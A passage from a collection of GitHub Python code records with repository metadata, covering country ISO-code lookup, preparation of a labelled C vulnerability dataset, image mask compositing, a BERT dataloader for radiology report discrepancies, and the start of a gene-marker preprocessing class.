urllib.request.urlopen(COUNTRY_INFO_URL).read().decode('utf8')\n # Strip the BOM\n if udata[0] == codecs.BOM_UTF8.decode('utf8'):\n udata = udata[1:]\n # Ignore blank lines\n lines = [l for l in udata.split('\\n') if l]\n # Find the line with the headers (starts #ISO)\n header_line = [l for l in lines if l.startswith('#ISO')][0]\n headers = header_line[1:].split('\\t')\n # Now get all the countries\n country_lines = [l for l in lines if not l.startswith('#')]\n countries = []\n for line in country_lines:\n countries.append(dict(list(zip(headers, line.split('\\t')))))\n lastDS = countries[-1]\n wanted = 'Country ISO ISO3 Continent tld'.split()\n #if 'Germany' in line:\n # print('DS',lastDS['Country'],lastDS['ISO'], lastDS['ISO3'])\n #if 'United' in line:\n # print('DS',lastDS['Country'],lastDS['ISO'], lastDS['ISO3'])\n #for k in wanted:\n # print('DSK', k, lastDS[k] )\n #for kk in lastDS.keys():\n ## print('DSKK', kk, lastDS[kk] )\n #DS\n #nDS = 0\n #for h in headers:\n # print('h', h)\n # if h == 'Germany': print ('DE', nDS)\n # nDS += 1\n return countries\n\ndef getCountryInfo(country):\n\n countries=get_geonames_country_data()\n iso2, iso3, continent = '-' * 3\n for c in countries:\n #print 'Checking ', c['Country'], country\n if c['Country'] == country:\n iso2 = c['ISO']\n iso3 = c['ISO3']\n continent = c['Continent']\n return iso2, iso3, continent\n\ndef lonlat2ccodes(lon,lat):\n country = getplace(lon, lat)\n iso2, iso3, continent = getCountryInfo(country)\n return iso2, iso3, country, continent\n\nif __name__ == '__main__':\n\n import sys\n\n if len(sys.argv) > 1:\n if sys.argv[1] == '--xy':\n try:\n x, y = list(map(float, sys.argv[2].split()))\n country = getplace(x, y)\n iso2, iso3, continent = getCountryInfo(country)\n print('step-by-step', x, y, ' => ', iso2, iso3, country, 
continent )\n iso2, iso3, country, continent = lonlat2ccodes(x,y)\n print('lonlat2codes', x, y, ' => ', iso2, iso3, country, continent )\n except:\n #print(help(CountryStuff))\n sys.exit('Usage: CountryStuff --xy \"lon lat\"')\n\n else: \n \n # test google suggestion\n #print(getplace(0.1,51.1))\n #print(getplace(0.1,51.2))\n #print(getplace(0.1,51.3))\n print('Mace Heed: ', getplace( -9.00,53.3175))\n print('Tudor Hill: ', getplace(-64.87,32.27))\n x = -(11.0+53/60.0)\n y=78.0+54/60.0\n print('Zeppelin: ', getplace(x, y))\n \n # test geoname suggestion\n #g=get_geonames_country_data()\n testers = 'Germany Turkey Canada Greenland China India'.split()\n testers.append('New Zealand')\n for ccs in testers:\n iso2, iso3, continent = getCountryInfo(ccs)\n print(ccs, 'ISO2:', iso2, 'ISO3:', iso3, 'Cont:', continent)\n \n", "repo_name": "mifads/pyscripts", "sub_path": "emxgeo/geocountries.py", "file_name": "geocountries.py", "file_ext": "py", "file_size_in_byte": 4891, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "urllib.request.urlopen", "line_number": 14, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 66, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 66, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 66, "usage_type": "name"}, {"api_name": "codecs.BOM_UTF8.decode", "line_number": 68, "usage_type": "call"}, {"api_name": "codecs.BOM_UTF8", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 120, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 122, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 130, "usage_type": "call"}]}
+{"seq_id": "24739390901", "text": "import pandas as pd\nimport os\nfrom tqdm import tqdm\ndata = pd.read_csv(\"../MSR_data_cleaned.csv\")\ndata_length = data.shape[0]\nprint(data_length)\nif not os.path.exists(\"../data/raw_code_Fan\"):\n os.mkdir(\"../data/raw_code_Fan\")\nvul_num = 0\nfor i in tqdm(range(data_length)):\n func_after = data.at[i, \"func_after\"]\n func_before = data.at[i,\"func_before\"]\n vul = data.at[i,\"vul\"]\n if vul ==1:\n vul_num = vul_num+1\n data_name = str(i)+\"_\"+str(vul)+\".c\"\n if func_after != func_before and vul != 1:\n print(data_name)\n filename = data_name\n # some files share the same name\n if os.path.exists(\"../data/raw_code_Fan\" + \"/\" + filename):\n with open(\"../data/raw_code_Fan\" + \"/\" + filename, 'r') as f:\n func = f.read()\n if func == func_after:\n print(filename)\n continue\n else:\n with open(\"../data/raw_code_Fan\" + \"/\" +filename, 'w') as f:\n f.write(func_before)\n i = i + 1\n with open(\"../data/raw_code_Fan\" + \"/\" + filename, 'w') as f:\n f.write(func_before)\nprint(vul_num)\n", "repo_name": "202221632987/Leev", "sub_path": "pre_code/make_code_Fan.py", "file_name": "make_code_Fan.py", "file_ext": "py", "file_size_in_byte": 1120, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 8, "usage_type": "call"}, {"api_name": 
"tqdm.tqdm", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "38547795679", "text": "\"\"\"\n @Time : 203/22/19 10:40\n @Author : TaylorMei\n @Email : mhy845879017@gmail.com\n \n @Project : iccv\n @File : mask_detection.py\n @Function:\n \n\"\"\"\n\"\"\"\n @Time : 203/12/19 19:00\n @Author : TaylorMei\n @Email : mhy845879017@gmail.com\n\n @Project : iccv\n @File : mask_mirror.py\n @Function:\n\n\"\"\"\nimport os\nimport numpy as np\nimport skimage.io\n\ndetection_path = '/media/iccd/TAYLORMEI/mirror/camera-ready/mask_rcnn_white_c_crop_resize/'\nimage_path = '/media/iccd/TAYLORMEI/mirror/camera-ready/color_mirror/'\nmask_path = '/media/iccd/TAYLORMEI/mirror/camera-ready/taylor5_384/'\noutput_path = '/media/iccd/TAYLORMEI/mirror/camera-ready/green_detection/'\n\nif not os.path.exists(output_path):\n os.mkdir(output_path)\n\nimglist = os.listdir(detection_path)\nfor i, imgname in enumerate(imglist):\n print(i, imgname)\n detection = skimage.io.imread(detection_path + imgname)\n image = skimage.io.imread(image_path + imgname[:-4] + '.jpg')\n mask = skimage.io.imread(mask_path + imgname)\n print(detection.shape)\n print(mask.shape)\n\n output = np.zeros_like(detection)\n\n for j in range(detection.shape[2]):\n if j != 3:\n output[:, :, j] = np.where(mask >= 127.5, image[:, :, j], detection[:, :, j])\n else:\n output[:, :, j] = detection[:, :, j]\n\n skimage.io.imsave(output_path + imgname, output)", "repo_name": "Mhaiyang/iccv", "sub_path": "utils/mask_detection2.py", "file_name": "mask_detection2.py", "file_ext": "py", "file_size_in_byte": 1353, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.exists", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 33, "usage_type": "call"}, {"api_name": "skimage.io.io.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "skimage.io.io", "line_number": 36, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 36, "usage_type": "name"}, {"api_name": "skimage.io.io.imread", "line_number": 37, "usage_type": "call"}, {"api_name": "skimage.io.io", "line_number": 37, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 37, "usage_type": "name"}, {"api_name": "skimage.io.io.imread", "line_number": 38, "usage_type": "call"}, {"api_name": "skimage.io.io", "line_number": 38, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 46, "usage_type": "call"}, {"api_name": "skimage.io.io.imsave", "line_number": 50, "usage_type": "call"}, {"api_name": "skimage.io.io", "line_number": 50, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "12422548025", "text": "from sklearn import model_selection\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import WeightedRandomSampler\nfrom torch.utils.data import Dataset\nimport os\nimport torch\nimport pandas as pd\nimport numpy as np\n\nfrom discrepancy_datasetup import balance_dataset\nfrom discrepancy_datasetup import synonymsReplacement, 
shuffledTextAugmentation\nclass TextDataset(Dataset):\n\n def __init__(self, dataframe, tokenizer, dir_base, wordDict = None):\n self.tokenizer = tokenizer\n self.data = dataframe\n self.text1 = dataframe.impression1\n self.text2 = dataframe.impression2\n self.targets = self.data.label\n self.row_ids = self.data.index\n self.max_len = 512\n self.wordDict = wordDict\n\n #self.df_data = dataframe.values\n self.data_path = os.path.join(dir_base, \"public_datasets/candid_ptx/dataset1/dataset/\")\n self.dir_base = dir_base\n\n def __len__(self):\n return len(self.text1)\n\n\n def __getitem__(self, index):\n # text extraction\n #global img, image\n text1 = str(self.text1[index])\n text2 = str(self.text2[index])\n #if self.wordDict != None:\n # text1 = synonymsReplacement(self.wordDict, text1)\n # text1 = shuffledTextAugmentation(text1)\n # text2 = synonymsReplacement(self.wordDict, text2)\n # text2 = shuffledTextAugmentation(text2)\n text1 += text2\n text1 = \" \".join(text1.split())\n text2 = str(self.text2[index])\n text2 = \" \".join(text2.split())\n\n\n\n #print(text)\n #text = \"\"\n\n #text = text.replace(\"[ALPHANUMERICID]\", \"\")\n #text = text.replace(\"[date]\", \"\")\n #text = text.replace(\"[DATE]\", \"\")\n #text = text.replace(\"[AGE]\", \"\")\n\n #text = text.replace(\"[ADDRESS]\", \"\")\n #text = text.replace(\"[PERSONALNAME]\", \"\")\n #text = text.replace(\"\\n\", \"\")\n\n inputs1 = self.tokenizer.encode_plus(\n text1,\n None,\n add_special_tokens=True,\n max_length=self.max_len,\n #pad_to_max_length=True,\n padding= 'max_length', #True, # #TOD self.max_len,\n # padding='longest',\n truncation='longest_first',\n return_token_type_ids=True\n )\n ids1 = inputs1['input_ids']\n mask1 = inputs1['attention_mask']\n token_type_ids1 = inputs1[\"token_type_ids\"]\n\n inputs2 = self.tokenizer.encode_plus(\n text2,\n None,\n add_special_tokens=True,\n max_length=self.max_len,\n #pad_to_max_length=True,\n padding= 'max_length', #True, # #TOD self.max_len,\n # padding='longest',\n truncation='longest_first',\n return_token_type_ids=True\n )\n ids2 = inputs2['input_ids']\n mask2 = inputs2['attention_mask']\n token_type_ids2 = inputs2[\"token_type_ids\"]\n\n return {\n 'text1' : text1,\n 'ids1': torch.tensor(ids1, dtype=torch.long),\n 'mask1': torch.tensor(mask1, dtype=torch.long),\n 'token_type_ids1': torch.tensor(token_type_ids1, dtype=torch.long),\n\n 'text2' : text2,\n 'ids2': torch.tensor(ids2, dtype=torch.long),\n 'mask2': torch.tensor(mask2, dtype=torch.long),\n 'token_type_ids2': torch.tensor(token_type_ids2, dtype=torch.long),\n\n 'targets': torch.tensor(self.targets[index], dtype=torch.float),\n 'row_ids': self.row_ids[index],\n }\n\n\ndef setup_dataloader(df, config, tokenizer, wordDict=None):\n\n seed = config[\"seed\"]\n dir_base = config[\"dir_base\"]\n BATCH_SIZE = config[\"batch_size\"]\n # Splits the data into 80% train and 20% valid and test sets\n train_df, test_valid_df = model_selection.train_test_split(\n df, train_size=config[\"train_samples\"], random_state=seed, shuffle=True, stratify=df.label.values\n )\n # Splits the test and valid sets in half so they are both 10% of total data\n test_df, valid_df = model_selection.train_test_split(\n test_valid_df, test_size=config[\"valid_samples\"], random_state=seed, shuffle=True,\n stratify=test_valid_df.label.values\n )\n\n train_df = pd.concat([train_df, test_df])\n\n #train_df = balance_dataset(df, config)\n #train_df = balance_dataset(train_df, config, aug_factor=1)\n train_df.set_index(\"id\", inplace=True)\n 
valid_df.set_index(\"id\", inplace=True)\n test_df.set_index(\"id\", inplace=True)\n\n #print(fail)\n load_df_from_preset_location = False\n if load_df_from_preset_location:\n #train_loc = os.path.join(dir_base, 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_final_train/seed' +str(config[\"seed\"]) + '/train_df_seed' +str(config[\"seed\"]) + '.xlsx')\n #train_loc = os.path.join(dir_base, 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated/second_and_third_labeled_df'+ '.xlsx')\n #training set\n #train_loc = os.path.join(dir_base, 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_first_train/seed' + str(config[\"seed\"]) + '/train_df_seed' +str(config[\"seed\"]) + '.xlsx')\n train_loc = os.path.join(dir_base, 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_first_train_first_second_labeled/seed' + str(config[\"seed\"]) + '/train_df_seed' +str(config[\"seed\"]) + '.xlsx')\n train_df = pd.read_excel(train_loc, engine='openpyxl')\n\n #valid_loc = os.path.join(dir_base,'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_finetuning/seed' +str(config[\"seed\"]) + '/valid_df_seed' +str(config[\"seed\"]) + '.xlsx')\n #valid_loc = os.path.join(dir_base,'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_first_train/seed' +str(config[\"seed\"]) + '/valid_df_seed' +str(config[\"seed\"]) + '.xlsx')\n valid_loc = os.path.join(dir_base,'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_first_train_first_second_labeled/seed' +str(config[\"seed\"]) + '/valid_df_seed' +str(config[\"seed\"]) + '.xlsx')\n valid_df = pd.read_excel(valid_loc, engine='openpyxl')\n\n test_loc = os.path.join(dir_base,'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_v1/seed' +str(config[\"seed\"]) + '/test_df_seed' +str(config[\"seed\"]) + '.xlsx')\n test_df = pd.read_excel(test_loc, engine='openpyxl')\n\n fine_tuning = True\n if fine_tuning:\n\n train_loc = os.path.join(dir_base,\n 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_finetune/seed' + str(\n config[\"seed\"]) + '/train_df_seed' + str(config[\"seed\"]) + '.xlsx')\n train_df = pd.read_excel(train_loc, engine='openpyxl')\n\n valid_loc = os.path.join(dir_base,\n 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_finetune/seed' + str(\n config[\"seed\"]) + '/valid_df_seed' + str(config[\"seed\"]) + '.xlsx')\n valid_df = pd.read_excel(valid_loc, engine='openpyxl')\n\n test_loc = os.path.join(dir_base,\n 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_v1/seed' + str(\n config[\"seed\"]) + '/test_df_seed' + str(config[\"seed\"]) + '.xlsx')\n test_df = pd.read_excel(test_loc, engine='openpyxl')\n\n save_df = True\n if save_df:\n save_location = config[\"save_location\"]\n train_dataframe_location = os.path.join(save_location, 'train_df_seed' + str(config[\"seed\"]) + '.xlsx')\n print(train_dataframe_location)\n train_df.to_excel(train_dataframe_location, index=True)\n\n valid_dataframe_location = os.path.join(save_location, 'valid_df_seed' + str(config[\"seed\"]) + '.xlsx')\n print(valid_dataframe_location)\n valid_df.to_excel(valid_dataframe_location, index=True)\n\n #test_dataframe_location = os.path.join(save_location, 'test_df_seed' + 
str(config[\"seed\"]) + '.xlsx')\n #print(test_dataframe_location)\n #test_df.to_excel(test_dataframe_location, index=True)\n\n training_set = TextDataset(train_df, tokenizer, dir_base=dir_base, wordDict= wordDict)\n valid_set = TextDataset(valid_df, tokenizer, dir_base=dir_base)\n test_set = TextDataset(test_df, tokenizer, dir_base=dir_base)\n\n train_params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 4\n }\n\n test_params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 4\n }\n\n ## added to trying sampling from training data\n #y_train_indices = training_set.indices\n #y_train_indices = range(0,len(train_df)) #gets a list of the index 0 to lenth of df\n #y_train = [training_set.targets[i] for i in y_train_indices] #get a list of all of the training labels\n #print(f\"y train: {y_train}\")\n #print(f\"y train len: {len(y_train)}\")\n #class_sample_count = np.array(\n # [len(np.where(y_train == t)[0]) for t in np.unique(y_train)]) # counts the number of each training value\n #print(type(class_sample_count))\n #print(f\"class sample count: {class_sample_count}\")\n\n #class_sample_count = np.array([1134, 94]) #sets the counts to the values in the orginal set\n #class_sample_count = np.array([1228, 1228])\n #class_sample_count = np.array([94, 1134])\n #class_sample_count = np.array([94, 1134])\n\n #print(f\"class sample count: {class_sample_count}\")\n #print(type(class_sample_count))\n\n #class_sample_count = [1134, 94]\n #weight = 1. / class_sample_count # calculates the weight for each sample\n #weight = np.array([1134/1758, 94/1758])\n #weight = np.array([1271/1762, 105/1762])\n #weight = np.array([100, 105/1762])\n\n\n #print(f\"weight values: {weight}\")\n #samples_weight = np.array([weight[t] for t in y_train]) # makes an array where each index is the weight to select it\n #print(f\"len of sample weights: {len(samples_weight)}\")\n #samples_weight = torch.from_numpy(samples_weight)\n #print(f\"samples weight: {samples_weight}\")\n #sampler = WeightedRandomSampler(samples_weight.type('torch.DoubleTensor'), 1368, replacement=False) # was 1228\n\n #y = torch.from_numpy(np.array([0, 0, 1, 1, 0, 0, 1, 1]))\n #y = torch.from_numpy(np.array(y_train))\n #sampler = StratifiedSampler(class_vector=y, batch_size=16)\n\n #training_loader = DataLoader(training_set, sampler=sampler, batch_size=BATCH_SIZE, num_workers=4)\n ##\n training_loader = DataLoader(training_set, **train_params)\n\n valid_loader = DataLoader(valid_set, **test_params)\n test_loader = DataLoader(test_set, **test_params)\n\n return training_loader, valid_loader, test_loader\n\n\ndef setup_random_training_loader(df_negative, df_positive, base_pos, base_neg, new_pos, new_neg, config, tokenizer, wordDict=None):\n # base dataest is 1134 negatives for 94 postives\n\n seed = config[\"seed\"]\n dir_base = config[\"dir_base\"]\n BATCH_SIZE = config[\"batch_size\"]\n\n #train_df_positive = df_positive.sample(n=21)\n #train_df = pd.concat([train_df_positive, df_negative])\n #train_df = pd.concat([ train_df, base_pos])\n #df_negative = df_negative.sample(n=1134)\n #df_positive = df_positive.sample(n=94)\n #train_df = pd.concat([df_negative, base_pos])\n\n #added_pos = new_pos.sample(11) #get n samples from positves cases\n #postive_df = pd.concat([base_pos, added_pos]) #add the n samples to the already postive cases\n #negative_df = pd.concat([base_neg, new_neg]) #add the new negative samples to the negative cases\n #train_df = pd.concat([postive_df, negative_df]) #create final training set\n\n train_df 
= pd.concat([base_pos, base_neg])\n\n training_set = TextDataset(train_df, tokenizer, dir_base=dir_base, wordDict= wordDict)\n\n\n train_params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 4\n }\n\n training_loader = DataLoader(training_set, **train_params)\n\n return training_loader", "repo_name": "zhuemann/discrepancy_detection", "sub_path": "dataloader.py", "file_name": "dataloader.py", "file_ext": "py", "file_size_in_byte": 12524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 93, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 95, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 98, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 100, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 102, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 113, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 117, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 117, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", 
"line_number": 164, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 237, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 271, "usage_type": "call"}]} +{"seq_id": "24748458957", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 23 06:14:31 2022\n\n@author: docker\n\"\"\"\nimport copy\nimport random\nimport itertools\nimport collections\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom gldadec import utils\n\nclass SetData():\n def __init__(self,verbose=True):\n self.verbose = verbose\n self.raw_df = None\n self.marker_dic = None\n self.final_int = None\n self.input_mat = None\n \n def set_expression(self,df):\n \"\"\"\n Set gene expression data.\n It is better to keep as many genes as possible.\n ----------\n df : DataFrame\n Genes in rows and samples in columns.\n \"\"\"\n df.index = [t.upper() for t in df.index.tolist()] # re-index\n self.raw_df = df\n if self.verbose:\n a,b = self.raw_df.shape\n print(a,'genes')\n print(b,'samples')\n \n def set_marker(self,marker_dic:dict):\n \"\"\"\n Set marker list for each cell\n ----------\n marker_dic : dict\n \n \"\"\"\n # convert uppercase\n new_v = []\n new_k = []\n for i,k in enumerate(marker_dic):\n if len(marker_dic.get(k)) > 0:\n tmp_v = sorted([t.upper() for t in marker_dic.get(k)])\n new_v.append(tmp_v)\n new_k.append(k)\n else:\n pass\n marker_dic2 = dict(zip(new_k,new_v))\n self.marker_dic = marker_dic2\n if self.verbose:\n print(len(self.marker_dic),'cells')\n print(len(marker_dic)-len(self.marker_dic),'cells were removed (markers were not registered)')\n \n def marker_info_processing(self,do_plot=True):\n # reflect expression data\n marker_dic = self.marker_dic\n genes = self.raw_df.index.tolist()\n new_v = []\n new_k = []\n for i,k in enumerate(marker_dic):\n marker = marker_dic.get(k)\n tmp_common = sorted(list(set(marker) & set(genes)))\n if len(tmp_common) > 0:\n tmp_v = [t.upper() for t in tmp_common]\n new_v.append(tmp_v)\n new_k.append(k)\n else:\n pass\n marker_dic3 = dict(zip(new_k,new_v))\n self.marker_dic = marker_dic3\n marker_genes = set(list(itertools.chain.from_iterable(list(self.marker_dic.values()))))\n if self.verbose:\n print('--- reflect genes in expression ---')\n print(len(self.marker_dic),'cells')\n print(len(marker_dic)-len(self.marker_dic),'cells were removed (markers were not registered)')\n print(len(marker_genes),'genes were registered')\n \n # plot the original registered marker size\n if do_plot:\n y = [len(t) for t in self.marker_dic.values()]\n x = [i for i in range(len(y))]\n plt.bar(x,y)\n plt.xticks(x,self.marker_dic.keys(),rotation=75)\n plt.title('Original Marker Size')\n plt.show()\n \n # detect cell specific markers\n count_dic = dict(collections.Counter(list(itertools.chain.from_iterable(list(self.marker_dic.values())))))\n sort_count = sorted(count_dic.items(),key=lambda x : x[1])\n unique_marker = [] # no overlap\n for t in sort_count:\n 
if t[1] == 1:\n unique_marker.append(t[0])\n else:\n pass\n new_v = []\n new_k = []\n for i,k in enumerate(self.marker_dic):\n tmp_v = sorted(list(set(self.marker_dic.get(k)) & set(unique_marker)))\n if len(tmp_v) > 0:\n new_v.append(tmp_v)\n new_k.append(k)\n else:\n pass\n self.spe_marker_dic = dict(zip(new_k,new_v))\n spe_marker_genes = set(list(itertools.chain.from_iterable(list(self.spe_marker_dic.values()))))\n if self.verbose:\n print('--- extract cell specific marker ---')\n print(len(self.spe_marker_dic),'cells')\n print(set(self.marker_dic.keys())-set(self.spe_marker_dic.keys()),'cells were removed (no marker after removing overlap)')\n print(len(spe_marker_genes),'genes were registered')\n \n # plot the cell specific marker size\n if do_plot:\n y = [len(t) for t in self.spe_marker_dic.values()]\n x = [i for i in range(len(y))]\n plt.bar(x,y)\n plt.xticks(x,self.spe_marker_dic.keys(),rotation=75)\n plt.title('Specific Marker Size')\n plt.show()\n \n def set_random(self,random_sets:list):\n \"\"\"\n Random states list\n ----------\n random_sets : list\n e.g. [1448, 1632, 5913, 7927, 8614,...]\n \"\"\"\n self.random_sets = random_sets\n \n def expression_processing(self,random_genes=None,random_n=0,specific=True,random_s=None,prior_norm=True,norm_scale=1000):\n \"\"\"\n 1. Determine if the markers are cell specific.\n 2. Add non-marker gene at random.\n 3. Process expression data into a format for analysis\n ----------\n random_n : int\n DESCRIPTION. The default is 0.\n specific : bool\n DESCRIPTION. The default is True.\n \"\"\"\n if specific:\n if self.verbose:\n print('use specific markers')\n self.marker_final_dic = self.spe_marker_dic\n else:\n if self.verbose:\n print('use overlap markers')\n self.marker_final_dic = self.marker_dic\n \n genes = list(itertools.chain.from_iterable(list(self.marker_final_dic.values()))) # marker genes\n \n raw_df = copy.deepcopy(self.raw_df)\n if random_s is None:\n random_s = self.random_sets[0]\n random.seed(random_s)\n random_candidates = sorted(list(set(raw_df.index.tolist()) - set(genes))) # total genes - marker genes\n if random_genes is None:\n random_genes = random.sample(random_candidates,random_n) # choose genes from non-marker genes\n if self.verbose:\n print(len(random_genes),'genes were added at random')\n else:\n pass\n \n union = sorted(list(set(random_genes) | set(genes)))\n common = sorted(list(set(raw_df.index.tolist()) & set(union))) # fix the output gene order\n target_df = raw_df.loc[common]\n\n # prior information normalization\n if prior_norm:\n linear_norm = utils.freq_norm(target_df,self.marker_final_dic)\n linear_norm = linear_norm.loc[sorted(linear_norm.index.tolist())]\n final_df = linear_norm/norm_scale\n else:\n final_df = target_df/norm_scale\n self.final_int = final_df.astype(int) # convert int\n self.input_mat = np.array(self.final_int.T,dtype='int64')\n\n # seed-topic preparation\n gene_names = [t.upper() for t in self.final_int.index.tolist()]\n self.gene2id = dict((v, idx) for idx, v in enumerate(gene_names))\n self.random_genes = random_genes\n \n def expression_processing2(self,specific=True):\n \"\"\"\n 1. Determine if the markers are cell specific.\n 2. Add non-marker gene at random to each topic.\n 3. Process expression data into a format for analysis\n ----------\n specific : bool\n DESCRIPTION. 
The default is True.\n \"\"\"\n if specific:\n if self.verbose:\n print('use specific markers')\n self.marker_final_dic = self.spe_marker_dic\n else:\n if self.verbose:\n print('use overlap markers')\n self.marker_final_dic = self.marker_dic\n \n marker_final_dic = copy.deepcopy(self.marker_final_dic)\n genes = list(itertools.chain.from_iterable(list(marker_final_dic.values()))) # marker genes\n raw_df = copy.deepcopy(self.raw_df)\n\n random_list = []\n new_list = []\n for i,k in enumerate(marker_final_dic):\n m = marker_final_dic.get(k)\n random_candidates = sorted(list(set(raw_df.index.tolist()) - set(genes))) # total genes - marker genes\n random.seed(i)\n random_gene = random.sample(random_candidates,len(m))\n m.extend(random_gene)\n new_list.append(sorted(m))\n random_list.append(random_gene)\n genes.extend(random_gene)\n new_dic = dict(zip(list(marker_final_dic.keys()), new_list))\n # FIXME: overwrite\n self.marker_final_dic = new_dic\n \n common = list(itertools.chain.from_iterable(list(new_dic.values()))) # marker genes\n final_df = raw_df.loc[common]\n self.final_int = final_df.astype(int) # convert int\n self.input_mat = np.array(self.final_int.T,dtype='int64')\n\n # seed-topic preparation\n gene_names = [t.upper() for t in self.final_int.index.tolist()]\n self.gene2id = dict((v, idx) for idx, v in enumerate(gene_names))\n #self.random_genes = random_genes\n \n def seed_processing(self):\n \"\"\"\n Prepare seed information for use as a guide.\n \n input_mat : np.array\n samples are in rows and genes (markers) are in columns.\n array([[7, 4, 5, ..., 4, 9, 